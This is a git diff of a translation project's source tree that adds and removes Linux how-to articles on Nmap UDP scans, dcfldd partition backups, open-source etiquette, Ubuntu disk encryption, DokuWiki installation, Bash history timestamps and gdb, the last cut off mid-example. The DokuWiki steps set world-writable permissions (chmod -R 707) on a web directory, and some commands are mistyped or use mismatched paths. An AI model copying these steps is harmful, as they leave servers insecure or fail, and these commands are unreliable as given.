05.png](https://www.linuxforum.com/attachments/figure-05-png.109/) + +**FIGURE 5** + +**NOTE:** When performing a UDP Scan you are required to have root permissions. + +The high quantity of the number of packets is due to the fact that UDP is being used. Once the NMAP system sends a request it is not guaranteed that the packet was received. Because of the possible loss of packets the packets are sent multiple times. + +-------------------------------------------------------------------------------- + +via: https://www.linuxforum.com/threads/nmap-common-scans-part-one.3637/ + +作者:[Jarret][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxforum.com/members/jarret.268/ +[1]:https://www.linuxforum.com/threads/nmap-installation.3431/ diff --git a/sources/tech/20170112 Partition Backup.md b/sources/tech/20170112 Partition Backup.md new file mode 100644 index 0000000000..310c95be8d --- /dev/null +++ b/sources/tech/20170112 Partition Backup.md @@ -0,0 +1,146 @@ +Partition Backup +============ + +Many times you may have data on a partition, especially on a Universal Serial Bus (USB) drive. It may be necessary at times to make a copy of a drive or a single partition on it. Raspberry Pi users definitely have this need for the bootable SD Cards. Owners of other small form computers can also find this useful. Sometimes it is best to make a backup quickly if a device seems to be failing. + +To perform the examples in this article you will need a utility called 'dcfldd'. + +**The dcfldd Utility** + +The utility is an enhancement of the 'dd' utility from the 'coreutils' package. The 'dcfldd' was made by Nicholas Harbour while he worked at the Department of Defense Computer Forensics Lab (DCFL). The name is then based off where he worked – 'dcfldd'. + +For systems still using the CoreUtils 8.23 or less there isn't an option to easily see the progress of the copy being performed. Sometimes it seems as if nothing is happening and you are tempted to stop the copy. + +**NOTE:** If you have the ‘dd’ version 8.24 or later then you need not use ‘dcfldd’ and simply replace any ‘dcfldd’ with ‘dd’. All other parameters will work. + +On a Debian system simply use your Package Manager and search for 'dcfldd'. You can also open a Terminal and use the command: + +_sudo apt-get install dcfldd_ + +For a Red Hat system try the following: + +_cd /tmp +wget dl.fedoraproject.org/pub/epel/6/i386/dcfldd-1.3.4.1-4.el6.i686.rpm +sudo yum install dcfldd-1.3.4.1-4.el6.i686.rpm +dcfldd --version_ + +**NOTE:** The above installs the 32-bit version. For the 64-bit version use the following commands: + +_cd /tmp +wget dl.fedoraproject.org/pub/epel/6/x86_64/dcfldd-1.3.4.1-4.el6.x86_64.rpm +sudo yum install dcfldd-1.3.4.1-4.el6.x86_64.rpm +dcfldd --version_ + +The last statement of each set of commands will list the version of the 'dcfldd' and show you that the command file has been downloaded. + +**NOTE: **Be sure you execute the ‘dd’ or ‘dcfldd’ as root. + +Now that you have the command installed you can continue on with using it to backup and restore partitions. + +**Backup Partitions** + +When backing up a drive it is possible to back up the whole drive or a single partition. If the drive has multiple partitions then each can be backed up separately. + +Before we get too far in performing a backup let's look at the difference of a drive and partition. Let's assume we have an SD Card which is formatted as one large drive. The SD Card contains only one partition. If the space is split to allow the SD Card to be seen as two drives, then it has two partitions. If a program like GParted were opened for an SD Card, as shown in Figure 1, you can see it has two partitions. + +**FIGURE 1** + +The drive is /dev/sdc and contains both partitions /dev/sdc1 and /dev/sdc2. + +Let's take, for instance, an SD Card from a Raspberry Pi. The SD Card is 8 GB in size and has two partitions (as shown in Figure 1). The first partition contains BerryBoot which is a boot loader. The second partition contains Kali. There is no space available to install a second Operating System (OS). A second SD Card is to be used which is 16 GB in size, but to copy it to the second SD Card the first one must be backed up. + +To back up the first SD Card we will back up the drive which is /dev/sdc. The command to perform the backup is as follows: + +_dcfldd if=/dev/sdc of=/tmp/SD-Card-Backup.img_ + +The backup is made of the Input File (if) and the output file (of) is set to the folder '/tmp' and a file called 'SD-Card-Backup.img'. + +The 'dd' and 'dcfldd' both read and write the files one byte at a time. Technically with the above command it reads and writes a default of 512 bytes at a time. Keep in mind that the copy is an exact copy – bit for bit and byte for byte. + +The default of 512 bytes can be changed with the parameter for Block Size - 'bs='. For instance, to read/write 1 megabyte at a time the parameter 'bs=1M'. There can be some discrepancy in the abbreviations used as follows: + +* b – 512 bytes +* KB – 1000 bytes +* K – 1024 bytes +* MB – 1000x1000 bytes +* M – 1024x1024 bytes +* GB – 1000x1000x1000 bytes +* G – 1024x1024x1024 bytes + +You can specify the read blocks and write blocks separately. To specify the read amount use ‘ibs=’. To specify the write amount then use ‘obs=’. + +I performed a test to backup a 120 MB partition using three different Block Sizes. The first was the default of 512 bytes and it took 7 seconds. The second was a Block Size of 1024 K and took 2 seconds. The third had a Block Size of 2048 K and took 3 seconds. The times will vary depending on the system, various other hardware implementations, but in general larger block sizes than the defaults can be a little faster. + +Once you have a backup made you will need to know how to restore the data to a drive. + +**Restore Partitions** + +Now that we have a backup at some point we can assume the data may become corrupted or need to be restored for some reason. + +The command is the same as the backup except that the source and target are reversed. In the above example the command would be changed to: + +_dcfldd of=/dev/sdc if=/tmp/SD-Card-Backup.img_ + +Here, the image file is being used as the input file (if) and the drive (sdc) is used as the output file (of). + +**NOTE:** Do remember that the output device will be overwritten and all data on it will be lost. It is usually best to remove all partitions from the SD Card with GParted before restoring data. + +If you have a use for multiple SD Cards, such as having multiple Raspberry Pi boards, you can write to multiple cards at once. To do this you need to know the card’s ID on the system. For example, let’s say we want to copy the image ‘BerryBoot.img’ to two SD Cards. The SD Cards are at /dev/sdc and /dev/sdd. The command will be set to read/write in 1 MB Blocks while showing the progress. The command would be: + +_dcfldd if=BerryBoot.img bs=1M status=progress | tee >(dcfldd of=/dev/sdc) | dcfldd of=/dev/sdd_ + +In this command the first dcfldd uses the input file and sets the Block Size to 1 MB. The status is set to show the progress. The input is then piped (|) to the command ‘tee’. The ‘tee’ is used to split the input to multiple places. The first output is to the command ‘(dcfldd of=/dev/sdc)’. The command is in parenthesis and will be performed as a command. The last pipe (|) is needed, otherwise the ‘tee’ command will send the information to the ‘stdout’ (screen) as well. So the final output is to the command ‘_dcfldd of=/dev/sdd’_. If you had a third card, or even more, simply add another redirector and command such as ‘_>(dcfldd of=/dev/sde_’. + +**NOTE:** Do remember that the final command must be after a pipe (|). + +Data being written must be verified at times to be sure the data is correct. + +**Verify Data** + +Once an image is made or a backup restored you can verify the data being written. To verify data you will use a different program called ‘_diff_’. + +To use ‘diff’ you will need to designate the location of the image file and the physical media where it was copied from or written to on the system. The ‘_diff_’ command can be used after the backup was made or after the image was restored. + +The command has two parameters. The first is the physical media and the second is the image file name. + +From the example of ‘_dcfldd of=/dev/sdc if=/tmp/SD-Card-Backup.img’_ the ‘_diff_’ command would be: + +_diff /dev/sdc /tmp/SD-Card-Backup.img_ + +If any differences are found between the image and the physical device you will be alerted. If no messages are given then the data has been verified as identical. + +Making sure the data is identical is key to verifying the integrity of the backup or restore. One main problem to watch for when performing a Backup is image size. + +**Splitting The Image** + +Let’s assume you want to back up a 16GB SD Card. The image will then be approximately the same size. What if you can only back it up to a FAT32 partition? The maximum file size limit is 4 GB on FAT32. + +What must be done is that the file will have to be split into 4 GB pieces. The splitting of the image file can be done while it is being written by piping (|) the data to the ‘_split_’ command. + +The backup is performed in the same way, but the command will include the pipe and split command. The example backup command is ‘_dcfldd if=/dev/sdc of=/tmp/SD-Card-Backup.img_’ and the new command for splitting the file is as follows: + +_dcfldd if=/dev/sdc | split -b 4000MB - /tmp/SD-Card-Backup.img_ + +**NOTE:** The size suffix means the same as for the ‘_dd_’ and ‘_dcfldd_’ command. The dash by itself in the ‘_split_’ command is used to fill the input file which is being piped from the the ‘_dcfldd_’ command. + +The files will be saved as ‘_SD-Card-Backup.imgaa_’ and ‘_SD-Card-Backup.imgab_’ and so on. If you are worried about the file size being too close to the 4 GB limit, then try 3500MB. + +Restoring the files back to the drive is simple. You use the command ‘_ca_’ to join them and then write the output using ‘_dcfldd_’ as follows: + +_cat /tmp/SD-Card-Backup.img* | dcfldd of=/dev/sdc_ + +You can include any desired parameters to the command for the ‘_dcfldd_’ portion. + +I hope you understand and can perform any needed backup and restoration of data as you need for SD Cards and the like. + +-------------------------------------------------------------------------------- + +via: https://www.linuxforum.com/threads/partition-backup.3638/ + +作者:[Jarret][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxforum.com/members/jarret.268/ diff --git a/sources/tech/20170112 The 6 unwritten rules of open source development.md b/sources/tech/20170112 The 6 unwritten rules of open source development.md new file mode 100644 index 0000000000..918225a1d7 --- /dev/null +++ b/sources/tech/20170112 The 6 unwritten rules of open source development.md @@ -0,0 +1,66 @@ +The 6 unwritten rules of open source development +============================================================ + +> Do you want to be a successful and valued member of an open source project? Follow these unwritten rules + + + ![The 6 unwritten rules of open source development](http://images.techhive.com/images/article/2016/12/09_opensource-100698477-large.jpg) + +>_Matt Hicks is vice president of software engineering at Red Hat and one of the founding members of the Red Hat OpenShift team. He has spent 15 years in software engineering with a variety of roles in development, operations, architecture, and management._ + +The sports world is rife with unwritten rules. These are the behaviors and rituals that are observed but rarely documented in an official capacity. For example, in baseball, unwritten rules range from not stealing bases when well ahead to never giving up an intentional walk when there’s a runner on first. To outsiders, these are esoteric, perhaps even nonsensical guidelines, but they are followed by every player who wants to be a valued teammate and respected opponent. + +Software development, particularly _open source_ software development, also has an invisible rulebook. As in other team sports, these rules can have a significant impact on how an open source community treats a developer, especially newcomers. + + +### Walk before you run + +Before interacting with any community, open source or otherwise, you need to do your homework. For prospective open source contributors, this means understanding the community’s mission and learning where you can help from the onset. Everyone wants to contribute code, but far fewer developers are ready, willing, and able to do the grunt work: testing patches, reviewing code, sifting through documentation and correcting errors, and all of those other generally undesirable tasks that are required for a healthy community. + +Why do this when you can start cranking out beautiful lines of code? It’s about trust and, more important, showing that you care about the community as a whole and not developing only the features that you care about. + + +### Make an impact, not a crater + +As you build up your reputation with a given open source community, it’s important to develop a broad understanding of the project and the code base. Don’t stop at the mission statement; dive into the project itself and understand what makes it tick outside of your own area of expertise. Beyond broadening your own understanding as a developer, this helps you gain insight into how your code contributions could impact the larger project, not only your little piece of the pie. + +For example, maybe you want to create a revision to a networking module. You build it and test it, and it looks good, so you send it off to the community for more testing. As it turns out, this module breaks a security setting or causes a major storage incident when deployed in a certain manner -- issues that could have been remedied had you looked at the code base as a whole rather than your piece alone. Showing that you have a broad understanding of how various parts of the project interact with others -- and developing your patches to make an impact, not a crater -- will go a long way toward making your contributions appreciated. + +### Patch bombing is not OK + +Your work is not over when your code is submitted. There will be discussion about the change and a lot of QA and testing yet to be done if accepted. You want to make sure you are putting in the time and effort to understand how you can move your code and patches forward without them becoming a burden on other members. + +### Help others before helping yourself + +Open source communities aren’t a dog-eat-dog world; they’re about putting the value of the project before individual contributions and individual success. If you want to increase your odds of being seen as a valued member of the community (and get your code accepted), help others with their efforts. If you know about networking, review networking modules -- apply your expertise to make the whole code base better. It’s no surprise that top reviewers often correlate to top contributors. The more you help, the more valued you are. + +### Address the edge + +As a developer, you’re likely looking to contribute to an open source project to address a particular pain point. Maybe your preferred operating system isn’t supported or you desperately want to modernize the security technology used by the community. The best way to introduce changes, especially more aggressive ones, is to make them impossible to refuse. Know enough about the code base to think through every edge case. Add capabilities without breaking existing functionality. Pour your energy into the completeness of your feature, not only the submission. + +### Don’t give up + +Open source communities have plenty of fly-by-night members, but with commitment comes credibility. Don’t merely walk away when a patch is rejected. Find out why it was rejected, make those fixes, and try again. As you work on your patch, keep up with changes to the code base and make sure your patch remains mergeable as the project evolves. Don’t leave it to others to patch up your patch. As the author, take the burden on yourself and keep other community members free to do the same with their work. + +These unwritten rules might seem simple, but too many open source contributors don’t follow them. Developers who do so will not only succeed in advancing a project for themselves; they will help to advance open source in general. + +-------------------------------------------------------------------------------- + +via: http://www.infoworld.com/article/3156776/open-source-tools/the-6-unwritten-rules-of-open-source-development.html + +作者:[Matt Hicks][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.infoworld.com/blog/new-tech-forum/ +[1]:https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html&via=infoworld&text=The+6+unwritten+rules+of+open+source+development +[2]:https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html +[3]:http://www.linkedin.com/shareArticle?url=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html&title=The+6+unwritten+rules+of+open+source+development +[4]:https://plus.google.com/share?url=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html +[5]:http://reddit.com/submit?url=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html&title=The+6+unwritten+rules+of+open+source+development +[6]:http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3156776%2Fopen-source-tools%2Fthe-6-unwritten-rules-of-open-source-development.html +[7]:http://www.infoworld.com/article/3156776/open-source-tools/the-6-unwritten-rules-of-open-source-development.html#email +[8]:http://www.infoworld.com/article/3152565/linux/5-rock-solid-linux-distros-for-developers.html#tk.ifw-infsb +[9]:http://www.infoworld.com/newsletters/signup.html#tk.ifw-infsb diff --git a/sources/tech/20170113 How to Encrypt Your Hard Disk in Ubuntu.md b/sources/tech/20170113 How to Encrypt Your Hard Disk in Ubuntu.md deleted file mode 100644 index da0257a792..0000000000 --- a/sources/tech/20170113 How to Encrypt Your Hard Disk in Ubuntu.md +++ /dev/null @@ -1,105 +0,0 @@ -How to Encrypt Your Hard Disk in Ubuntu -============================================================ - ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/hdd-encryption-ubuntu.jpg "How to Encrypt Your Hard Disk in Ubuntus") - -Privacy, security and encryption go hand in hand. With encryption users can take extra steps to increase the security and privacy of their operating system. In this article we’ll go over the benefits and downsides of encrypting the entire hard drive on Ubuntu Linux. Additionally, we’ll cover exactly how to set up encryption at the OS level and encrypt the home directory. The encryption process is rewarding and not as complicated as some might think! With all that in mind, let’s get started! - - -### Pros and Cons of Encryption - -Though encrypting an entire hard drive sounds like a flawless idea, there are some issues in doing it. Let’s go over the pros and cons. - -### Benefits of Encryption - -* Increased privacy -* Only those with the encryption key can access the operating system and all the files on it -* No state-governments or hackers can spy on your machine and invade your privacy - -### Downsides of Encryption - -* Accessing and mounting Linux file systems on other Linux operating systems will be difficult if not practically impossible -* Recovering data from these partitions is impossible -* If a user loses the decryption key, they are out of luck - -### Preparing Installation - -Encrypting with Ubuntu is best done at the OS level right when the installation starts. It isn’t feasible to encrypt an active Ubuntu installation, so back up all your important files to [Dropbox][10], [Google Drive][11] (or even to extra hard drives) and prepare to reinstall Ubuntu. - - ![ubuntu-encrypt-ubuntu-alternative-downloads](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-ubuntu-alternative-downloads.jpg "ubuntu-encrypt-ubuntu-alternative-downloads") - -Start out by downloading the latest version of Ubuntu from [here][12], and get a USB flash drive (of at least 2GBs in size) ready. - -A program is needed in order to make a live USB disk. Head to [etcher.io][13] and download the Etcher tool. Extract it from the zip archive, and right click (or highlight with the mouse and press the Enter key) on the extracted file to run it. - - ![ubuntu-encrypt-etcher](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-etcher.jpg "ubuntu-encrypt-etcher") - -**Note**: Etcher will ask to create an icon – select “yes.” - -Inside Etcher click the “Select Image” button, and navigate towards the Ubuntu ISO image downloaded earlier. Then, plug in the USB flash drive. Etcher will automatically detect it and select for you. Finally, select the “Flash!” button to start the creation process. - -Once completed, reboot the computer with the flash drive still plugged in, load the computer’s BIOS and select the option to boot from USB. - -**Note**: if your machine does not support booting from USB, download the 32bit version of Ubuntu and burn the ISO to a DVD using the burning software on your computer. - -### Encrypting Your Entire Hard Disk - -With the live Ubuntu disk loaded, the installation can begin. When the Ubuntu installation begins, a window similar to this will appear. Keep in mind that each installation process is different and may say different things. - - ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-installation-type1.jpg "ubuntu-encrypt-installation-type") - -To begin the encrypted installation, select “Erase disk and install Ubuntu,” and check “**Encrypt the new Ubuntu installation for Security**” box. This will automatically select LVM as well. Both boxes must be checked. After selecting the encryption options, click “Install Now” to begin installation. - -**Note**: if this is a dual-boot machine, you may notice install alongside instead of erase. Select it, and select the encryption options mentioned above as well. - -Clicking “Install Now” with the encryption options selected in Ubuntu will bring up a configuration page. This page allows the user to set the encryption key for the installation. - - ![ubuntu-encrypt-choose-security-key](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-choose-security-key.jpg "ubuntu-encrypt-choose-security-key") - -Enter the security key. The security key window will grade the effectiveness of the security key, so use this tool as a barometer and try to get a security key that says “strong password.” Once chosen, enter it again to confirm it, and then write this key down on a piece of paper for safekeeping. - -Additionally, check the box that says “Overwrite empty disk space.” This is an optional step. Select install now once everything is entered. - - ![ubuntu-encrypt-timezone-select](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-timezone-select.jpg "ubuntu-encrypt-timezone-select") - -What follows selecting the encryption key is the typical Ubuntu installation configuration. Select the time zone, and create a username along with a secure password. - - ![ubuntu-encrypt-home-folder](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-home-folder-e1483900399596.jpg "ubuntu-encrypt-home-folder") - -Along with creating an encrypted hard drive on Ubuntu, select the “require my password to log in” box and the “encrypt my home folder” box during the username creation process. This will add yet another layer of encryption for data on the system. - -With the username, encryption settings and everything else configured, the Ubuntu installation will begin. Soon after, Ubuntu will inform the user that the installation has been completed and that everything is ready to go! - -### Conclusion - -From this point on Ubuntu will not be able to be accessed without the decryption key at startup. Though tedious, encrypting Ubuntu this way is the easiest and takes advantage of the features already present in the operating system. Users will not need to learn much, nor will they need to rely on third party programs to accomplish this task. - - ![ubuntu-encrypt-decrypt-computer](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-decrypt-computer.jpg "ubuntu-encrypt-decrypt-computer") - -With Ubuntu decrypted, it runs like normal. No extra hoops to jump through nor overly complicated decryption methods to learn. This method of security is a must for those who value their privacy but don’t want to fuss. - -Would you encrypt your Ubuntu installation? Tell us below! - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/encrypt-hard-disk-in-ubuntu/ - -作者:[Derrik Diener][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/derrikdiener/ -[1]:https://www.maketecheasier.com/author/derrikdiener/ -[2]:https://www.maketecheasier.com/encrypt-hard-disk-in-ubuntu/#comments -[3]:https://www.maketecheasier.com/category/linux-tips/ -[4]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F -[5]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F&text=How+to+Encrypt+Your+Hard+Disk+in+Ubuntu -[6]:mailto:?subject=How%20to%20Encrypt%20Your%20Hard%20Disk%20in%20Ubuntu&body=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F -[7]:https://www.maketecheasier.com/why-is-iphone-overheating/ -[8]:https://www.maketecheasier.com/it-security-ethical-hacking-training/ -[9]:https://support.google.com/adsense/troubleshooter/1631343 -[10]:http://www.maketecheasier.com/tag/dropbox -[11]:http://www.maketecheasier.com/tag/google-drive -[12]:https://www.ubuntu.com/download/alternative-downloads -[13]:https://etcher.io/ diff --git a/sources/tech/20170114 Build your own wiki on Ubuntu with DokuWiki.md b/sources/tech/20170114 Build your own wiki on Ubuntu with DokuWiki.md deleted file mode 100644 index bb4caac0af..0000000000 --- a/sources/tech/20170114 Build your own wiki on Ubuntu with DokuWiki.md +++ /dev/null @@ -1,123 +0,0 @@ -Build your own wiki on Ubuntu with DokuWiki -============================================================ - - -We use [DokuWiki][2] and it’s awesome. Our team has an internal knowledgebase and we use DokuWiki to store all our reviews, tutorials etc. It’s simple, easy to install and easy to use. Most importantly, it’s not resource-heavy. In this post, we’re going to show you how to install DokuWiki on an Ubuntu 16.04 server. - -### Requirements - -DokuWiki doesn’t need much since it doesn’t need a database. Here are the requirements of DokuWiki: - -* PHP 5.3.4 or newer (PHP 7+ recommended) -* A web server (Apache/Nginx/Any other) -* A VPS. [Get a cheap managed VPS][1] and you won’t have to do any of this. Just contact the support team and they will install it for you. - -### Instructions - -Before you do anything, you should upgrade your system. Run the following command: - -``` -sudo apt-get update && sudo apt-get upgrade -``` - -### Install Apache - -We are going to need a web server for our wiki. We’ll be using Apache for our tutorial, but you can also use Nginx or any other web server. Install apache with: - -``` -apt-get install apache2 -``` - -### Install PHP7 and modules - -Next, you should install PHP if you don’t already have it installed. In this tutorial, we’ll be using PHP7\. So, install PHP7 and a few other PHP modules with the following command: - -``` -apt-get install php7.0-fpm php7.0-cli php-apcu php7.0-gd php7.0-xml php7.0-curl php7.0-json php7.0-mcrypt php7.0-cgi php7.0 libapache2-mod-php7.0 -``` - -### Download and install DokuWiki - -Here comes the main part – the actual installation of DokuWiki. - -First, create a directory for your DokuWiki: - -``` -mkdir -p /var/www/thrwiki -``` - -Navigate to the directory you just created: - -``` -cd /var/www/thrwiki -``` - -Run the following command to download the latest (stable) version of DokuWiki: - -``` -wget http://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz -``` - -Unpack the .tgz file: - -``` -tar xvf dokuwiki-stable.tgz -``` - -Change some file/folder permissions: - -``` -www-data:www-data -R /var/www/thrwiki -chmod -R 707 /var/www/thrwiki -``` - -### Configure Apache for DokuWiki - -Create a .conf file for your DokuWiki (we’ll name it thrwiki.conf, but you can name it however you want) and open it with your favorite text editor. We’ll be using nano: - -``` -touch /etc/apache2/sites-available/thrwiki.conf -ln -s /etc/apache2/sites-available/thrwiki.conf /etc/apache2/sites-enabled/thrwiki.conf -nano /etc/apache2/sites-available/thrwiki.conf -``` -Add the following in your thrwiki.conf file: -``` - -ServerAdmin wikiadmin@thishosting.rocks -DocumentRoot /var/www/thrwiki/ -ServerName wiki.thishosting.rocks -ServerAlias www.wiki.thishosting.rocks - -Options FollowSymLinks -AllowOverride All -Order allow,deny -allow from all - -ErrorLog /var/log/apache2/wiki.thishosting.rocks-error_log -CustomLog /var/log/apache2/wiki.thishosting.rocks-access_log common - -``` -Edit the lines to correspond with your server setup. Replace wikiadmin@thishosting.rocks, wiki.thishosting.rocks etc with your own dataNow, restart apache for the changes to take effect: -``` -systemctl restart apache2.service -``` -That’s it. You are done. Now you can continue installing and configuring DokuWiki via the front-end interface at http://wiki.thishosting.rocks/install.phpOnce you are done with the installation, you can remove the install.php file with: -``` -rm -f /var/www/html/thrwiki/install.php -``` - -Feel free to leave a comment below if you need any help. - --------------------------------------------------------------------------------- - -via: https://thishosting.rocks/build-your-own-wiki-on-ubuntu-with-dokuwiki/ - -作者:[thishostrocks.com][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://twitter.com/thishostrocks -[1]:https://thishosting.rocks/best-cheap-managed-vps/ -[2]:https://github.com/splitbrain/dokuwiki diff --git a/sources/tech/20170114 Set Date and Time for Each Command You Execute in Bash History.md b/sources/tech/20170114 Set Date and Time for Each Command You Execute in Bash History.md deleted file mode 100644 index a461b43cf9..0000000000 --- a/sources/tech/20170114 Set Date and Time for Each Command You Execute in Bash History.md +++ /dev/null @@ -1,96 +0,0 @@ -Translating by Hymantin -Set Date and Time for Each Command You Execute in Bash History -============================================================ - -By default, all commands executed by Bash on the command line are stored in history buffer or recorded in a file called ~/.bash_history. This means that a system administrator can view a list of commands executed by users on the system or a user can view his/her command history using the [history command][1] like so. - -``` -$ history -``` -[ - ![Linux History Command](http://www.tecmint.com/wp-content/uploads/2017/01/Linux-History-Command.png) -][2] - -Linux History Command - -From the output of the [history command][3] above, the date and time when a command was executed is not shown. This is the default setting on most if not all Linux distributions. - -In this article, we will explain how you can configure time stamp information when each command in the Bash history was executed to be displayed. - -The date and time associated with each history entry can be written to the history file, marked with the history comment character by setting the HISTTIMEFORMAT variable. - -There are two possible ways of doing this: one does it temporarily while the other makes it permanent. - -To set HISTTIMEFORMAT variable temporarily, export it as below on the command line: - -``` -$ export HISTTIMEFORMAT='%F %T' -``` - -In the export command above, the time stamp format: - -1. `%F` – expands to full date same, as %Y-%m-%d (year-month-date). -2. `%T` – expands to time; same as %H:%M:%S (hour:minute:seconds). - -Read through the [date command][4] man page for additional usage information: - -``` -$ man date -``` - -Then check your command history as follows: - -``` -$ history -``` -[ - ![Display Linux Command History with Date and Time](http://www.tecmint.com/wp-content/uploads/2017/01/Set-Date-and-Time-on-Linux-Commands-History.png) -][5] - -Display Linux Command History with Date and Time - -However, if you want to configure this variable permanently, open the file `~/.bashrc` with your favorite editor: - -``` -$ vi ~/.bashrc -``` - -And add the line below in it (you mark it with a comment as your own configuration): - -``` -#my config -export HISTTIMEFORMAT='%F %T' -``` - -Save the file and exit, afterwards, run the command below to effect the changes made to the file: - -``` -$ source ~/.bashrc -``` - -That’s all! Do share with us any interesting history command tips and tricks or your thoughts about this guide via the comment section below. - --------------------------------------------------------------------------------- - -作者简介: - -![](http://1.gravatar.com/avatar/7badddbc53297b2e8ed7011cf45df0c0?s=128&d=blank&r=g) - -I am Ravi Saive, creator of TecMint. A Computer Geek and Linux Guru who loves to share tricks and tips on Internet. Most Of My Servers runs on Open Source Platform called Linux. Follow Me: Twitter, Facebook and Google+ - --------------------------------------------------------------------------------- - -via: http://www.tecmint.com/display-linux-command-history-with-date-and-time/ - -作者:[Ravi Saive][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.tecmint.com/author/admin/ -[1]:http://www.tecmint.com/history-command-examples/ -[2]:http://www.tecmint.com/wp-content/uploads/2017/01/Linux-History-Command.png -[3]:http://www.tecmint.com/history-command-examples/ -[4]:http://www.tecmint.com/sort-ls-output-by-last-modified-date-and-time/ -[5]:http://www.tecmint.com/wp-content/uploads/2017/01/Set-Date-and-Time-on-Linux-Commands-History.png diff --git a/sources/tech/20170116 How to debug C programs in Linux using gdb.md b/sources/tech/20170116 How to debug C programs in Linux using gdb.md deleted file mode 100644 index c664d71e27..0000000000 --- a/sources/tech/20170116 How to debug C programs in Linux using gdb.md +++ /dev/null @@ -1,178 +0,0 @@ -Translating by zhb127 -How to debug C programs in Linux using gdb -============================================================ - -### On this page - -1. [GDB debugger basics][1] -2. [GDB usage example][2] -3. [Conclusion][3] - -Regardless of how experienced a coder you are, any software you develop can't be completely free of bugs. So, identifying bugs and fixing them is one of the most important tasks in the software development cycle. While there are many ways of identifying bugs (testing, self review of code, and more), there are dedicated software - dubbed debuggers - that help you understand exactly where the problem is, so that you can easily fix it. - -If you are a C/C++ programmer or develop software using the Fortran and Modula-2 programming languages, you'll be glad to know there exists an excellent debugger - dubbed [GDB][4] - that lets you easily debug your code for bugs and other problems. In this article, we will discuss the basics of GDB, including some of the useful features/options it provides. - -But before we move ahead, it's worth mentioning that all the instructions as well examples presented in this article have been tested on Ubuntu 14.04LTS. The example code used in the tutorial is written in C language; the command line shell we've used is bash (version  4.3.11); and the GDB version we've used is 7.7.1. - -### GDB debugger basics - -In layman's terms, GDB lets you peek inside a program while the program is executing, something that lets you help identify where exactly the problem is. We'll discuss the usage of the GDB debugger through a working example in the next section, but before that, here, we'll discuss a few basic points that'll help you later on. - -Firstly, in order to successfully use debuggers like GDB, you have to compile your program in such a way that the compiler also produces debugging information that's required by debuggers. For example, in case of the gcc compiler, which we'll be using to compile the example C program later on this tutorial, you need to use the -g command line option while compiling your code. - -To know what the gcc compiler's manual page says about this command line option, head [here][5]. - -Next step is to make sure that you have GDB installed on your system. If that's not the case, and you're on a Debian-based system like Ubuntu, you can easily install the tool using the following command: - -sudo apt-get install gdb - -For installation on any other distro, head [here][6]. - -Now, once you've compiled your program in a way that it's debugging-ready, and GDB is there on your system, you can execute your program in debugging mode using the following command: - -gdb [prog-executable-name] - -While this will initiate the GDB debugger, your program executable won't be launched at this point. This is the time where you can define your debugging-related settings. For example, you can define a breakpoint that tells GDB to pause the program execution at a particular line number or function. - -Moving on, to actually launch your program, you'll have to execute the following gdb command: - -run - -It's worth mentioning here that if your program requires some command line arguments to be passed to it, you can specify them here. For example: - -run [arguments] - -GDB provides many useful commands that come in handy while debugging. We'll discuss some of them in the example in next section. - -### GDB usage example - -Now we have a basic idea about GDB as well as its usage. So let's take an example and apply the knowledge there. Here's an example code: - -``` -#include - -int main() -{ - int out = 0, tot = 0, cnt = 0; - int val[] = {5, 54, 76, 91, 35, 27, 45, 15, 99, 0}; - - while(cnt < 10) - { - out = val[cnt]; - tot = tot + 